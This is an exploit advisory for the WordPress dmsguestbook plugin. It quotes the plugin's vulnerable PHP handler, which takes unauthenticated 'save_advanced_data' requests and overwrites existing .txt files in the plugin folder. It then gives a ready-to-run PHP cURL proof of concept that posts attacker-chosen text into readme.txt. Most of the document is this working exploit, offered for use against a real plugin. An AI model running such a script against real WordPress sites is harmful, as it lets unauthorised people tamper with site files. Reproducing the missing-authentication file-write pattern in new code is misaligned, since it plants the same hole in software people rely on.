WordPress Dmsguestbook Unauthenticated Data Injection

`http://packetstormsecurity.com/user/evex/  
Author:Evex  
Title:  
WordPress dmsguestbook Plugin File Manipulation  
Description:  
wordpress dmsguestbook plugin is vulnerable to a file manipulation security  
issue  
it allows an unauthenicated attacker to put text into existing text files  
only  
<?php  
/*  
Vulnerability Code:  
if ($POSTVARIABLE['action'] =='save_advanced_data') {  
  
$abspath = str_replace("\\","/", ABSPATH);  
  
// check the folder variable  
if($POSTVARIABLE['folder']=="language/"){  
$folder="language/";  
} else {$folder="";}  
  
// check the file variable xxxx.txt  
if(preg_match('/^[a-z0-9]+\.+(txt)/i', $POSTVARIABLE['file'])==1) {  
$file=$POSTVARIABLE['file'];  
} else {$file="";}  
  
clearstatcache();  
if (file_exists($abspath . "wp-content/plugins/dmsguestbook/" .  
$folder . $file)) {  
$handle = fopen($abspath . "wp-content/plugins/dmsguestbook/" .  
$folder . $file, "w");  
$writetofile = str_replace("\\", "",  
$POSTVARIABLE['advanced_data']);  
fwrite($handle, $writetofile);  
fclose($handle);  
message("<b>" . __("saved", "dmsguestbook") . "...</b>",300,800);  
} else {message("<br /><b>" . __("File not found!", "dmsguestbook")  
. "</b>",300,800);}  
}  
*/  
  
$TEXTTOINJECT = 'INPUT TEXT HERE';  
$TXTFILE = 'readme.txt'; #  
localhost/wp-content/plugins/dmsguestbook/readme.txt  
$url = "http://localhost/x/wordpress";  
$ch = curl_init();  
curl_setopt($ch,CURLOPT_POST,true);  
curl_setopt($ch,CURLOPT_POSTFIELDS,"action=save_advanced_data&file=$TXTFILE&advanced_data=$TEXTTOINJECT");  
curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);  
curl_setopt($ch,CURLOPT_URL,$url.'/wp-admin/admin.php?page=dmsguestbook');  
curl_exec($ch);  
echo "Payload Sent\nUrl: $url/wp-content/plugins/dmsguestbook/readme.txt";  
?>  
`